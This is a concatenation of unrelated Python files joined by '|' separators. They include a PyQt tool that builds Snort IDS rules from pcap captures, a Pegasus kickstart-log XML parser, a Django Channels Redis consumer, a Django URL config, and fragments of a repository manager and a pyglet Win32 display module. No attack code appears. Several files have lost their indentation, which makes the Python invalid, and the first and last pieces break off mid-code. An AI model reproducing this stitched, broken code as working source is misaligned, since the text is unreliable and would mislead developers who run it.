aLocalFiles:List[str] = cPath(uBaseLocalDir).GetFileList(bSubDirs=True, bFullPath=True)
SetVar(uVarName="REPMAN_LOCALBASENAME", oVarValue=uBaseLocalDir)
SetVar(uVarName="REPMAN_CNTFILES", oVarValue= str(len(aLocalFiles)))
Var_DelArray("REPMAN_LOCALFILENAMES[]")
i:int=0
for uLocalFile in aLocalFiles:
uIndex:str = str(i) + "]"
SetVar(uVarName="REPMAN_LOCALFILENAMES[" + uIndex ,oVarValue=uLocalFile)
i += 1
|
import sys
import math
from PyQt5 import QtWidgets
from PyQt5 import QtGui
from PyQt5 import QtCore
from mainwindow import Ui_MainWindow
from scapy.all import *
""" dump any string, ascii or encoded, to formatted hex output """
def dumpString(src, length=16):
FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
result = []
for i in xrange(0, len(src), length):
chars = src[i:i+length]
hex = ' '.join(["%02x" % ord(x) for x in chars])
printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or '.') for x in chars])
result.append(["%-*s" % (length*3, hex), "%s" % (printable,)])
return result
class Snort(QtWidgets.QMainWindow):
    """Main window of the Snort rule builder.

    Loads a pcap file, shows each packet as hex + printable text,
    reassembles TCP streams, and builds a Snort rule from the widgets'
    current values.
    """
    def __init__(self):
        super(Snort, self).__init__()
        self.ui = Ui_MainWindow()
        self.ui.setupUi(self)
        self.show()
        self.index = 0  # index of the packet currently displayed
        self.comboBoxes = [self.ui.srcCombo, self.ui.srcPortCombo, self.ui.destCombo, self.ui.destPortCombo]
        self.defaultFmt = self.ui.hexColumn.currentCharFormat()
        #setup scrollbars to be synced
        self.hexSlider = self.ui.hexColumn.verticalScrollBar()
        self.textSlider = self.ui.textColumn.verticalScrollBar()
        self.hexSlider.valueChanged.connect(self.syncScroll)
        self.textSlider.valueChanged.connect(self.syncScroll)
        self.ui.packetBox.valueChanged.connect(self.changePacket)
        self.ui.actionOpen.triggered.connect(self.openPCAP)
        self.ui.contentEdit.textChanged.connect(self.contentChanged)
        self.ui.flowCheck.stateChanged.connect(self.flowChecked)
        self.ui.streamButton.clicked.connect(self.assembleStream)
        # any change in a rule-related widget rebuilds the rule text
        self.ui.flowCombo.currentTextChanged.connect(self.buildRule)
        self.ui.actionCombo.currentTextChanged.connect(self.buildRule)
        self.ui.protoCombo.currentTextChanged.connect(self.buildRule)
        self.ui.srcCombo.currentTextChanged.connect(self.buildRule)
        self.ui.srcPortCombo.currentTextChanged.connect(self.buildRule)
        self.ui.dirCombo.currentTextChanged.connect(self.buildRule)
        self.ui.destCombo.currentTextChanged.connect(self.buildRule)
        self.ui.destPortCombo.currentTextChanged.connect(self.buildRule)
        self.streams = []  # one PacketList per assembled TCP stream

    def syncScroll(self, value):
        """Keep the hex and text columns scrolled in lockstep."""
        self.textSlider.setValue(value)
        self.hexSlider.setValue(value)

    def changePacket(self):
        """Display the packet selected in the spin box (1-based)."""
        self.index = self.ui.packetBox.value() - 1
        self.readPacket()

    def findStreams(self):
        """Detect TCP streams via their three-way handshake.

        Fills self.streams with one PacketList per detected stream.
        """
        tcp_streams = self.packets.filter(lambda p: p.haslayer(TCP))
        self.streams = []
        for syn in tcp_streams.filter(lambda p: p[TCP].flags & 0x02):
            for synack in tcp_streams.filter(lambda p: p[TCP].flags & 0x12 and p[TCP].ack == syn.seq + 1):
                ack = tcp_streams.filter(lambda p: p[TCP].flags & 0x10 and p[TCP].ack == synack.seq + 1)
                if ack:
                    srcport = syn[TCP].sport
                    dstport = syn[TCP].dport
                    L3 = IP
                    try:
                        #try underlayer
                        foot = syn[TCP].underlayer
                        srcip = foot.src
                        dstip = foot.dst
                        if type(foot) == IPv6:
                            L3 = IPv6
                    except Exception:
                        #try other, but upper layer
                        if IPv6 in syn:
                            srcip = syn[IPv6].src
                            dstip = syn[IPv6].dst
                            L3 = IPv6
                        elif IP in syn:  # BUG FIX: was `pkt`, undefined at this point
                            srcip = syn[IP].src
                            dstip = syn[IP].dst
                        else:
                            continue
                    ip_pair = (srcip, dstip)
                    port_pair = (srcport, dstport)
                    filtered_stream = tcp_streams.filter(lambda p: p[TCP].dport in port_pair and
                                                         p[TCP].sport in port_pair and
                                                         p[L3].src in ip_pair and
                                                         p[L3].dst in ip_pair)
                    assembled_stream = [syn, synack, ack[0]]
                    while True:
                        client_next_seq = assembled_stream[-1][TCP].seq
                        server_next_seq = assembled_stream[-1][TCP].ack
                        # renamed from `next`, which shadowed the builtin
                        nxt = filtered_stream.filter(lambda p: p.seq in (client_next_seq, server_next_seq) and
                                                     not p in assembled_stream)
                        if not nxt:
                            break
                        for pkt in nxt:
                            assembled_stream.append(pkt)
                    self.streams.append(PacketList(assembled_stream))

    def assembleStream(self):
        """Display the reassembled stream that contains the current packet."""
        pkt = self.packets[self.index]
        self.ui.hexColumn.clear()
        self.ui.textColumn.clear()
        thisStream = None
        for stream in self.streams:
            if pkt in stream:
                thisStream = stream
                break
        if thisStream is None:
            # packet is not part of any assembled stream; nothing to show
            # (previously this raised NameError on `thisStream`)
            return
        # NOTE(review): str(packet) yields raw bytes on Python 2 only;
        # on Python 3 scapy packets are serialized with bytes() — confirm
        # which interpreter this app targets.
        streamText = "".join([str(packet) for packet in thisStream])
        payload = dumpString(streamText)
        for line in payload:
            self.ui.hexColumn.appendPlainText(line[0])
            self.ui.textColumn.appendPlainText(line[1])

    def readPacket(self):
        """Render the current packet and preload the rule widgets from it."""
        self.clearAll()
        pkt = self.packets[self.index]
        payload = dumpString(str(pkt))
        for line in payload:
            self.ui.hexColumn.appendPlainText(line[0])
            self.ui.textColumn.appendPlainText(line[1])
        srcip = None  # stays None for packets without an IP/IPv6 layer
        if IP in pkt:
            self.ui.protoCombo.setCurrentText("ip")
            self.ui.srcCombo.insertItem(0, pkt[IP].src)
            self.ui.destCombo.insertItem(0, pkt[IP].dst)
            srcip = pkt[IP].src
        if IPv6 in pkt:
            self.ui.protoCombo.setCurrentText("ip")
            self.ui.srcCombo.insertItem(0, pkt[IPv6].src)
            self.ui.destCombo.insertItem(0, pkt[IPv6].dst)
            srcip = pkt[IPv6].src
        if TCP in pkt:
            self.ui.protoCombo.setCurrentText("tcp")
            self.ui.srcPortCombo.insertItem(0, str(pkt[TCP].sport))
            self.ui.destPortCombo.insertItem(0, str(pkt[TCP].dport))
            for stream in self.streams:
                if pkt in stream:
                    self.ui.flowCheck.setChecked(True)
                    self.ui.streamButton.setEnabled(True)
                    # the first packet of the stream (the SYN) is the client side
                    client = stream[0]
                    if IP in client:
                        layer = IP
                    else:
                        layer = IPv6
                    if srcip == client[layer].src:
                        self.ui.flowCombo.setCurrentText("to_server")
                    elif srcip == client[layer].dst:
                        self.ui.flowCombo.setCurrentText("to_client")
        if UDP in pkt:
            self.ui.protoCombo.setCurrentText("udp")
            self.ui.srcPortCombo.insertItem(0, str(pkt[UDP].sport))
            self.ui.destPortCombo.insertItem(0, str(pkt[UDP].dport))
        if ICMP in pkt:
            self.ui.protoCombo.setCurrentText("icmp")
        for combo in self.comboBoxes:
            combo.setCurrentIndex(0)
        self.buildRule()
        self.textSlider.setValue(0)

    def openPCAP(self):
        """Prompt for a pcap file, load it, and display the first packet."""
        filename = QtWidgets.QFileDialog.getOpenFileName(self, 'Open PCAP', filter='Packet Captures (*.cap *.pcap)')
        # BUG FIX: getOpenFileName returns a (path, filter) tuple, which is
        # truthy even when the dialog is cancelled — test the path itself
        if filename[0]:
            self.file = filename[0]
            self.packets = rdpcap(self.file)
            self.findStreams()
            self.ui.packetBox.setRange(1, len(self.packets))
            self.readPacket()

    def contentChanged(self):
        """Highlight the rule 'content' expression in both columns.

        The content string alternates literal text and |hex byte| sections;
        each section is matched in the corresponding column and the match is
        painted red. Also fills the depth/offset edits from the match bounds.
        """
        content = self.ui.contentEdit.text()
        hexContent = self.ui.hexColumn.toPlainText().replace("\n", "")
        textContent = self.ui.textColumn.toPlainText().replace("\n", "")
        if self.ui.nocaseCheck.isChecked():
            content = content.lower()
            textContent = textContent.lower()
        # reset any previous highlight in both documents
        cursor = QtGui.QTextCursor(self.ui.hexColumn.document())
        cursor.setPosition(0, QtGui.QTextCursor.MoveAnchor)
        cursor.setPosition(self.ui.hexColumn.document().characterCount() - 1, QtGui.QTextCursor.KeepAnchor)
        cursor.setCharFormat(self.defaultFmt)
        cursor2 = QtGui.QTextCursor(self.ui.textColumn.document())
        cursor2.setPosition(0, QtGui.QTextCursor.MoveAnchor)
        cursor2.setPosition(self.ui.textColumn.document().characterCount() - 1, QtGui.QTextCursor.KeepAnchor)
        cursor2.setCharFormat(self.defaultFmt)
        matchPointer = 0
        endPointer = 0
        start = 0
        end = 0
        match = False
        origContent = content
        while content:
            if content.startswith("|"):
                # |..| section: match against the hex column
                if content.count("|") > 1:
                    content = content[1:]
                    index = content.index("|")
                    search = content[0:index]
                    content = content[index + 1:]
                else:
                    search = content[1:]
                    content = None
                # NOTE(review): `search and A or B` binds as (search and A) or B;
                # looks intentional from the original, but verify edge cases
                if search and \
                   (not match and search in hexContent[endPointer:]) or \
                   (match and hexContent[endPointer:endPointer + len(search)] == search):
                    if not match:
                        end = hexContent[endPointer:].index(search) + len(search) + endPointer
                        start = hexContent[endPointer:].index(search) + endPointer
                        match = True
                        matchPointer = end
                    else:
                        end = end + len(search)
                    endPointer = end
                elif match:
                    # partial match failed: restart the scan after the first match
                    content = origContent
                    match = False
                    start = 0
                    end = 0
                    endPointer = matchPointer
                    matchPointer = 0
                else:
                    break
            else:
                # literal section: match against the text column
                if "|" in content:
                    search = content[0:content.index("|")]
                    content = content[content.index("|"):]
                else:
                    search = content
                    content = None
                textPointer = int(math.ceil(endPointer / 3.0))
                if search and \
                   (not match and search in textContent[textPointer:]) or \
                   (match and textContent[textPointer:len(search) + textPointer] == search):
                    if not match:
                        end = ((textContent[textPointer:].index(search) + len(search)) * 3) + endPointer
                        start = (textContent[textPointer:].index(search) * 3) + endPointer
                        match = True
                        matchPointer = end
                    else:
                        end = end + (len(search) * 3) + 1
                    endPointer = end
                elif match:
                    content = origContent
                    match = False
                    start = 0
                    end = 0
                    endPointer = matchPointer
                    matchPointer = 0
                else:
                    break
        if match:
            # account for the newline every 47 characters of the hex column;
            # `//` keeps the positions integral on Python 3 (setPosition
            # requires an int)
            start = start + (start // 47)
            end = end + (end // 47)
            fmt = QtGui.QTextCharFormat()
            fmt.setForeground(QtCore.Qt.red)
            cursor.setPosition(start, QtGui.QTextCursor.MoveAnchor)
            cursor.setPosition(end, QtGui.QTextCursor.KeepAnchor)
            cursor.setCharFormat(fmt)
            cursor2.setPosition(start // 3, QtGui.QTextCursor.MoveAnchor)
            cursor2.setPosition(math.ceil(end / 3.0), QtGui.QTextCursor.KeepAnchor)
            cursor2.setCharFormat(fmt)
            self.ui.depthEdit.setText(str(int(math.ceil(end / 3.0))))
            self.ui.offsetEdit.setText(str(start // 3))

    def clearAll(self):
        """Reset every widget to its initial state."""
        for combo in self.comboBoxes:
            combo.clear()
            combo.addItem("any")
        self.ui.destPortCombo.addItem("any")
        self.ui.hexColumn.clear()
        self.ui.textColumn.clear()
        self.ui.ruleText.clear()
        self.ui.contentEdit.clear()
        self.ui.flowCheck.setChecked(False)
        self.ui.flowCombo.setCurrentText("established")
        self.ui.flowCombo.setEnabled(False)
        self.ui.streamButton.setEnabled(False)
        self.ui.depthCheck.setChecked(False)
        self.ui.depthEdit.clear()
        self.ui.depthEdit.setEnabled(False)
        self.ui.offsetCheck.setChecked(False)
        self.ui.offsetEdit.clear()
        self.ui.offsetEdit.setEnabled(False)
        self.ui.distanceCheck.setChecked(False)
        self.ui.distanceEdit.clear()
        self.ui.distanceEdit.setEnabled(False)
        self.ui.withinCheck.setChecked(False)
        self.ui.withinEdit.clear()
        self.ui.withinEdit.setEnabled(False)
        self.ui.nocaseCheck.setChecked(False)

    def flowChecked(self):
        """Enable the flow combo only while the flow option is checked."""
        self.ui.flowCombo.setEnabled(self.ui.flowCheck.isChecked())
        self.buildRule()

    def buildRule(self):
        """Compose the Snort rule text from the current widget values."""
        self.ui.ruleText.clear()
        options = ""
        if self.ui.flowCheck.isChecked():
            options += "flow: %s;" % (self.ui.flowCombo.currentText(), )
        rule = "%s %s %s %s %s %s %s {%s}" % (
            self.ui.actionCombo.currentText(),
            self.ui.protoCombo.currentText(),
            self.ui.srcCombo.currentText(),
            self.ui.srcPortCombo.currentText(),
            self.ui.dirCombo.currentText(),
            self.ui.destCombo.currentText(),
            self.ui.destPortCombo.currentText(),
            options)
        self.ui.ruleText.appendPlainText(rule)
def main():
    """Create the Qt application and run the Snort rule-builder window."""
    app = QtWidgets.QApplication(sys.argv)
    window = Snort()  # keep a reference so the window is not collected
    sys.exit(app.exec_())
# Script entry point: start the GUI when executed directly.
if __name__ == '__main__':
    main()
|
"""
Pegasus utility functions for parsing a kickstart output file and returning requested information
"""
from xml.parsers import expat
import re
import sys
import logging
import traceback
import os
# Matches key = value pairs whose value is unquoted (value runs up to a comma or quote)
re_parse_props = re.compile(r'(\S+)\s*=\s*([^",]+)')
# Matches key = "value" pairs with a double-quoted value
re_parse_quoted_props = re.compile(r'(\S+)\s*=\s*"([^"]+)"')
logger = logging.getLogger(__name__)
class Parser:
"""
This class is used to parse a kickstart output file, and return
requested information.
"""
    def __init__(self, filename):
        """
        This function initializes the Parser class with the kickstart
        output file that should be parsed.
        """
        self._kickstart_output_file = filename
        # Flags tracking which XML element the expat callbacks are inside of
        self._parsing_job_element = False
        self._parsing_arguments = False
        self._parsing_main_job = False
        self._parsing_machine = False
        self._parsing_stdout = False
        self._parsing_stderr = False
        self._parsing_data = False
        self._parsing_cwd = False
        self._parsing_final_statcall = False
        # 1-based counter of records read from the file (for log messages)
        self._record_number = 0
        # Accumulators filled by the expat character-data callback
        self._arguments = []
        self._stdout = ""
        self._stderr = ""
        self._cwd = ""
        self._lfn = "" # filename parsed from statcall record
        # Keys extracted from the current record (the parse result)
        self._keys = {}
        # Caller-supplied mapping: element name -> list of wanted attributes
        self._ks_elements = {}
        # Open file handle for the kickstart output file (None until open())
        self._fh = None
        self._open_error = False
def open(self):
"""
This function opens a kickstart output file.
"""
try:
self._fh = open(self._kickstart_output_file)
except:
# Error opening file
self._fh = None
self._open_error = True
return False
# Open succeeded
self._open_error = False
return True
def close(self):
"""
This function closes the kickstart output file.
"""
try:
self._fh.close()
except:
return False
return True
    def read_record(self):
        """
        This function reads an invocation record from the kickstart
        output file. We also look for the struct at the end of a file
        containing multiple records. It returns a string containing
        the record, or None if it is not found.
        """
        buffer = ""
        #valid token that is parsed
        token = ""
        self._record_number += 1
        logger.debug( "Started reading record number %d from kickstart file %s" %( self._record_number, self._kickstart_output_file))
        # First, we find the beginning <invocation xmlns....
        while True:
            line = self._fh.readline()
            if line == '':
                # End of file, record not found
                return None
            if line.find("<invocation") != -1:
                token = "<invocation"
                break
            if ( line.find("[cluster-task") != -1 ):
                token = "[cluster-task"
                break
            if ( line.find("[cluster-summary") != -1 ):
                token = "[cluster-summary"
                break
            if ( line.find("[seqexec-task") != -1 ):
                #deprecated token
                token = "[seqexec-task"
                break
            if ( line.find("[seqexec-summary") != -1 ):
                #deprecated token
                token = "[seqexec-summary"
                break
        # Found something!
        #if line.find("<invocation") >= 0:
        if token == "<invocation" :
            # Found invocation record
            start = line.find("<invocation")
            buffer = line[start:]
            end = buffer.find("</invocation>")
            # Check if we have everything in a single line
            if end >= 0:
                end = end + len("</invocation>")
                return buffer[:end]
        #elif line.find("[seqexec-summary") >= 0:
        elif ( token == "[cluster-summary" or token == "[seqexec-summary" ):
            # Found line with cluster jobs summary
            start = line.find(token)
            buffer = line[start:]
            end = buffer.find("]")
            if end >= 0:
                end = end + len("]")
                return buffer[:end]
            # clustered record should be in a single line!
            logger.warning("%s: %s line is malformed... ignoring it..." % (self._kickstart_output_file, token ))
            return ""
        #elif line.find("[seqexec-task") >= 0:
        elif ( token == "[cluster-task" or token == "[seqexec-task" ):
            # Found line with task information
            start = line.find( token )
            buffer = line[start:]
            end = buffer.find("]")
            if end >= 0:
                end = end + len("]")
                return buffer[:end]
            # task record should be in a single line!
            logger.warning("%s: %s line is malformed... ignoring it..." % (self._kickstart_output_file, token))
            return ""
        else:
            return ""
        # Ok, now continue reading the file until we get a full record
        # (only the multi-line <invocation> case reaches this point)
        buffer = [buffer]
        while True:
            line = self._fh.readline()
            if line == '':
                # End of file, record not found
                return None
            #buffer = buffer + line
            buffer.append( line )
            if line.find("</invocation>") >= 0:
                break
        # Now, we got it, let's make sure
        end = line.find("</invocation>")
        if end == -1:
            return ""
        #end = end + len("</invocation>")
        # NOTE: trailing text after </invocation> on the last line is kept
        invocation = "".join(buffer)
        #print invocation
        logger.debug( "Finished reading record number %d from kickstart file %s" %( self._record_number, self._kickstart_output_file))
        return invocation
        #return buffer[:end]
def is_invocation_record(self, buffer=''):
"""
Returns True if buffer contains an invocation record.
"""
if buffer.find("<invocation") == -1:
return False
return True
def is_task_record(self, buffer=''):
"""
Returns True if buffer contains a task record.
"""
if ( buffer.find("[seqexec-task") != -1 or buffer.find( "[cluster-task" ) != -1 ):
return True
return False
def is_clustered_record(self, buffer=''):
"""
Returns True if buffer contains a clustered record.
"""
if ( buffer.find("[seqexec-summary") != -1 or buffer.find( "[cluster-summary" ) != -1):
return True
return False
def start_element(self, name, attrs):
"""
Function called by the parser every time a new element starts
"""
# Keep track if we are parsing the main job element
if name == "mainjob":
self._parsing_main_job = True
if name == "machine":
self._parsing_machine = True
# Keep track if we are inside one of the job elements
if (name == "setup" or name == "prejob" or
name == "mainjob" or name == "postjob" or name == "cleanup"):
self._parsing_job_element = True
if name == "argument-vector" and name in self._ks_elements:
# Start parsing arguments
self._parsing_arguments = True
elif name == "cwd" and name in self._ks_elements:
# Start parsing cwd
self._parsing_cwd = True
elif name == "data":
# Start parsing data for stdout and stderr output
self._parsing_data = True
elif name == "file" and name in self._ks_elements:
if self._parsing_main_job == True :
# Special case for name inside the mainjob element (will change this later)
for my_element in self._ks_elements[name]:
if my_element in attrs:
self._keys[my_element] = attrs[my_element]
elif name == "ram" and name in self._ks_elements:
if self._parsing_machine == True:
# Special case for ram inside the machine element (will change this later)
for my_element in self._ks_elements[name]:
if my_element in attrs:
self._keys[my_element] = attrs[my_element]
elif name == "uname" and name in self._ks_elements:
if self._parsing_machine == True:
# Special case for uname inside the machine element (will change this later)
for my_element in self._ks_elements[name]:
if my_element in attrs:
self._keys[my_element] = attrs[my_element]
elif name == "statcall":
if "id" in attrs:
if attrs["id"] == "stdout" and "stdout" in self._ks_elements:
self._parsing_stdout = True
elif attrs["id"] == "stderr" and "stderr" in self._ks_elements:
self._parsing_stderr = True
elif attrs["id"] == "final" :
self._parsing_final_statcall = True
self._lfn = attrs["lfn"]
elif name == "statinfo":
if self._parsing_final_statcall is True:
statinfo = {}
for my_element in self._ks_elements[name]:
if my_element in attrs:
statinfo[my_element] = attrs[my_element]
if not self._keys.has_key( "outputs"):
self._keys[ "outputs" ] = {} #a dictionary indexed by lfn
lfn = self._lfn
if lfn is None or not statinfo:
logger.warning( "Malformed/Empty stat record for output lfn %s %s" %(lfn, statinfo))
self._keys["outputs"][lfn] = statinfo
elif name == "usage" and name in self._ks_elements:
if self._parsing_job_element:
# Special case for handling utime and stime, which need to be added
for my_element in self._ks_elements[name]:
if my_element in attrs:
if my_element in self._keys:
try:
self._keys[my_element] = self._keys[my_element] + float(attrs[my_element])
except ValueError:
logger.warning("cannot convert element %s to float!" % (my_element))
else:
try:
self._keys[my_element] = float(attrs[my_element])
except ValueError:
logger.warning("cannot convert element %s to float!" % (my_element))
else:
# For all other elements, check if we want them
if name in self._ks_elements:
for my_element in self._ks_elements[name]:
if my_element in attrs:
self._keys[my_element] = attrs[my_element]
def end_element(self, name):
"""
Function called by the parser whenever we reach the end of an element
"""
# Stop parsing argement-vector and cwd if we reached the end of those elements
if name == "argument-vector":
self._parsing_arguments = False
elif name == "cwd":
self._parsing_cwd = False
elif name == "mainjob":
self._parsing_main_job = False
elif name == "machine":
self._parsing_machine = False
elif name == "statcall":
if self._parsing_stdout == True:
self._parsing_stdout = False
if self._parsing_stderr == True:
self._parsing_stderr = False
if self._parsing_final_statcall == True:
self._parsing_final_statcall = False
elif name == "data":
self._parsing_data = False
# Now, see if we left one of the job elements
if (name == "setup" or name == "prejob" or
name == "mainjob" or name == "postjob" or name == "cleanup"):
self._parsing_job_element = False
def char_data(self, data=''):
"""
Function called by the parser whenever there's character data in an element
"""
if self._parsing_cwd == True:
self._cwd += data
if self._parsing_arguments == True:
self._arguments.append(data.strip())
if self._parsing_stdout == True and self._parsing_data == True:
self._stdout += data
if self._parsing_stderr == True and self._parsing_data == True:
self._stderr += data
def parse_invocation_record(self, buffer=''):
"""
Parses the xml record in buffer, returning the desired keys.
"""
# Initialize variables
self._parsing_arguments = False
self._parsing_main_job = False
self._parsing_machine = False
self._parsing_stdout = False
self._parsing_stderr = False
self._parsing_data = False
self._parsing_cwd = False
self._arguments = []
self._stdout = ""
self._stderr = ""
self._cwd = ""
self._keys = {}
# Check if we have an invocation record
if self.is_invocation_record(buffer) == False:
return self._keys
# Add invocation key to our response
self._keys["invocation"] = True
# Prepend XML header
buffer = '<?xml version="1.0" encoding="ISO-8859-1"?>\n' + buffer
# Create parser
self._my_parser = expat.ParserCreate()
self._my_parser.StartElementHandler = self.start_element
self._my_parser.EndElementHandler = self.end_element
self._my_parser.CharacterDataHandler = self.char_data
# Parse everything!
output = self._my_parser.Parse(buffer)
# Add cwd, arguments, stdout, and stderr to keys
if "cwd" in self._ks_elements:
self._keys["cwd"] = self._cwd
if "argument-vector" in self._ks_elements:
self._keys["argument-vector"] = " ".join(self._arguments)
if "stdout" in self._ks_elements:
self._keys["stdout"] = self._stdout
if "stderr" in self._ks_elements:
self._keys["stderr"] = self._stderr
return self._keys
def parse_clustered_record(self, buffer=''):
"""
Parses the clustered record in buffer, returning all found keys
"""
self._keys = {}
# Check if we have an invocation record
if self.is_clustered_record(buffer) == False:
return self._keys
# Add clustered key to our response
self._keys["clustered"] = True
# Parse all quoted properties
for my_key, my_val in re_parse_quoted_props.findall(buffer):
self._keys[my_key] = my_val
# And add unquoted properties as well
for my_key, my_val in re_parse_props.findall(buffer):
self._keys[my_key] = my_val
return self._keys
def parse_task_record(self, buffer=''):
"""
Parses the task record in buffer, returning all found keys
"""
self._keys = {}
# Check if we have an invocation record
if self.is_task_record(buffer) == False:
return self._keys
# Add task key to our response
self._keys["task"] = True
# Parse all quoted properties
for my_key, my_val in re_parse_quoted_props.findall(buffer):
self._keys[my_key] = my_val
# And add unquoted properties as well
for my_key, my_val in re_parse_props.findall(buffer):
self._keys[my_key] = my_val
return self._keys
    def parse(self, keys_dict, tasks=True, clustered=True):
        """
        This function parses the kickstart output file, looking for
        the keys specified in the keys_dict variable. It returns a
        list of dictionaries containing the found keys. Look at the
        parse_stampede function for details about how to pass keys
        using the keys_dict structure. The function will return an
        empty list if no records are found or if an error happens.
        """
        my_reply = []
        # Place keys_dict in the _ks_elements
        self._ks_elements = keys_dict
        # Try to open the file; bail out with an empty result on failure
        if self.open() == False:
            return my_reply
        logger.debug( "Started reading records from kickstart file %s" %(self._kickstart_output_file))
        self._record_number = 0
        # Read first record
        my_buffer = self.read_record()
        # Loop while we still have record to read
        while my_buffer is not None:
            if self.is_invocation_record(my_buffer) == True:
                # We have an invocation record, parse it!
                try:
                    my_record = self.parse_invocation_record(my_buffer)
                except:
                    # A parse failure poisons the whole file: log it and
                    # return an empty result instead of partial data.
                    logger.warning("KICKSTART-PARSE-ERROR --> error parsing invocation record in file %s"
                                   % (self._kickstart_output_file))
                    logger.warning(traceback.format_exc())
                    # Found error parsing this file, return empty reply
                    my_reply = []
                    # Finish the loop
                    break
                my_reply.append(my_record)
            elif self.is_clustered_record(my_buffer) == True:
                # Check if we want clustered records too
                if clustered:
                    # Clustered records are seqexec summary records for clustered jobs
                    # We have a clustered record, parse it!
                    my_reply.append(self.parse_clustered_record(my_buffer))
            elif self.is_task_record(my_buffer) == True:
                # Check if we want task records too
                if tasks:
                    # We have a task record, parse it!
                    my_reply.append(self.parse_task_record(my_buffer))
            else:
                # We have something else, this shouldn't happen!
                # Just skip it
                pass
            # Read next record
            my_buffer = self.read_record()
        # Lastly, close the file
        self.close()
        return my_reply
def parse_stampede(self):
"""
This function works similarly to the parse function above,
but does not require a keys_dict parameter as it uses a
built-in list of keys speficically used in the Stampede
schema.
"""
stampede_elements = {"invocation": ["hostname", "resource", "user", "hostaddr", "transformation", "derivation"],
"mainjob": ["duration", "start"],
"usage": ["utime", "stime"],
"ram": ["total"],
"uname": ["system", "release", "machine"],
"file": ["name"],
"status": ["raw"],
"regular": ["exitcode"],
"argument-vector": [],
"cwd": [],
"stdout": [],
"stderr": [],
"statinfo": ["lfn", "size", "ctime", "user" ]}
return self.parse(stampede_elements, tasks=True, clustered=True)
def parse_stdout_stderr(self):
"""
This function extracts the stdout and stderr from a kickstart output file.
It returns an array containing the output for each task in a job.
"""
stdout_stderr_elements = {"invocation": ["hostname", "resource", "derivation", "transformation"],
"file": ["name"],
"regular": ["exitcode"],
"failure": ["error"],
"argument-vector": [],
"cwd": [],
"stdout": [],
"stderr": []}
return self.parse(stdout_stderr_elements, tasks=False, clustered=False)
if __name__ == "__main__":
# Let's run a test!
print "Testing kickstart output file parsing..."
# Make sure we have an argument
if len(sys.argv) < 2:
print "For testing, please give a kickstart output filename!"
sys.exit(1)
# Create parser class
p = Parser(sys.argv[1])
# Parse file according to the Stampede schema
output = p.parse_stampede()
# Print output
for record in output:
print record
|
import sys,os
from PyQt5 import QtCore, QtGui, QtWidgets, uic
from model import MainModel
from view import MainView
class App(QtWidgets.QApplication):
    """Qt application wiring the MainModel to the MainView (MVC entry point)."""

    def __init__(self, scriptpath, sys_argv):
        super(App, self).__init__(sys_argv)
        self.model = MainModel()
        self.main_view = MainView(self.model, scriptpath)
        self.main_view.show()  # plain show(); showMaximized() was considered
        # Emit once so the view renders the model's initial grid state.
        self.model.gridChanged.emit()
if __name__ == '__main__':
    # Directory containing this script, so resources can be resolved
    # relative to it regardless of the current working directory.
    scriptpath = os.path.dirname(os.path.abspath(sys.argv[0]))
    app = App(scriptpath, sys.argv)
    sys.exit(app.exec_())
|
from channels.auth import channel_session_user_from_http
from .models import Stream, Notification
import redis
import ast
from .task import sendNotifications, send_notifications
from channels import Group
import json
# Module-level redis connection: connecting and subscribing happen once,
# at import time.  NOTE(review): host/port are hardcoded -- consider
# moving them to settings.
redis_con = redis.Redis('demo.scorebeyond.com', 8007)
subs = redis_con.pubsub()
subs.subscribe('test')
@channel_session_user_from_http
def ws_connect(message):
    '''Capture redis stream and save it into database'''
    Group('stream').add(message.reply_channel)
    # NOTE(review): this loop blocks forever on the redis pubsub stream,
    # and the loop variable shadows the 'message' parameter above.
    for message in subs.listen():
        if message['type'] == "message":
            # Payload is a Python-literal string; parse it safely.
            data1 = ast.literal_eval(message['data'])
            print data1['name']
            # Dispatch a notification if one is configured for this event.
            if Notification.objects.filter(event_name=data1['name']):
                notif = Notification.objects.get(event_name=data1['name'])
                if notif.no_delay:
                    send_notifications(data1)
                else:
                    sendNotifications(data1, capture=notif.delay)
            # First time we see this event: record its field blueprint.
            if not Stream.objects.filter(name=data1['name']):
                type_list = []
                if not data1['info']:
                    Stream.objects.create(name=data1['name'], info="")
                else:
                    # Blueprint entries are "field:type_name" pairs.
                    for k, v in data1['info'].iteritems():
                        type_list.append(k+":"+type(v).__name__)
                    Stream.objects.create(name=data1['name'], info=','.join(type_list))
                Group('stream').send({
                    'text': json.dumps({
                        'event_name': data1['name'],
                        'blueprint': ','.join(type_list),
                    })
                })
        else:
            # Non-message pubsub events (e.g. subscribe confirmations).
            print message
|
"""effcalculator URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import url, include
from django.contrib.auth import views as auth_views
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'^api/', include('api.urls')),
    # Catch-all: everything else is served by the frontend app.
    url(r'^', include('frontend.urls'))
]
|
from base import Display, Screen, ScreenMode, Canvas
from pyglet.libs.win32 import _kernel32, _user32, types, constants
from pyglet.libs.win32.constants import *
from pyglet.libs.win32.types import *
class Win32Display(Display):
    def get_screens(self):
        """Return a Win32Screen for every monitor attached to this display."""
        monitors = []

        def _on_monitor(hMonitor, hdcMonitor, lprcMonitor, dwData):
            # lprcMonitor points at the monitor rectangle in virtual-screen
            # coordinates; convert it to origin plus size.
            rect = lprcMonitor.contents
            monitors.append(
                Win32Screen(self, hMonitor, rect.left, rect.top,
                            rect.right - rect.left, rect.bottom - rect.top))
            return True

        # EnumDisplayMonitors invokes the callback once per monitor.
        callback_type = WINFUNCTYPE(BOOL, HMONITOR, HDC, POINTER(RECT), LPARAM)
        _user32.EnumDisplayMonitors(NULL, NULL, callback_type(_on_monitor), 0)
        return monitors
class Win32Screen(Screen):
    """A single physical monitor, identified by a win32 HMONITOR handle."""

    # Mode active before the first set_mode() call; None until then.
    _initial_mode = None

    def __init__(self, display, handle, x, y, width, height):
        super(Win32Screen, self).__init__(display, x, y, width, height)
        self._handle = handle

    def get_matching_configs(self, template):
        # Match against the DC of the whole (virtual) screen: hwnd 0.
